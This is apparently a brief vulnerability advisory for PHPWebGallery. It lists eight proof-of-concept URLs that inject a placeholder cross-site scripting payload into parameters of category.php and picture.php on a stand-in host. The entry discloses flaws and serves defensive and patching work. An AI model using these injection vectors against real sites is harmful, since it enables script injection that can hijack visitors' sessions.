|
|
PHPWebGallery Multiple Cross-Site Scripting Vulnerabilities
This issue can be exploited through a web client. The following proofs of concept are available: http://www.example.com/phpwebgallery_dir/category.php?cat=">[xss] http://www.example.com/phpwebgallery_dir/category.php?cat=">[xss]&num=0 http://www.example.com/phpwebgallery_dir/category.php?cat=1&num=">[xss] http://www.example.com/phpwebgallery_dir/category.php?cat=">[xss]&search=date_available%3A2006-01-01 http://www.example.com/phpwebgallery_dir/category.php?cat=1&search=">[xss] http://www.example.com/phpwebgallery_dir/picture.php?cat=1&image_id=1&slideshow=">[xss] http://www.example.com/phpwebgallery_dir/picture.php?cat=1&image_id=1&show_metadata=">[xss] http://www.example.com/phpwebgallery_dir/picture.php?cat=1&image_id=1&start=">[xss] |
|
Privacy Statement |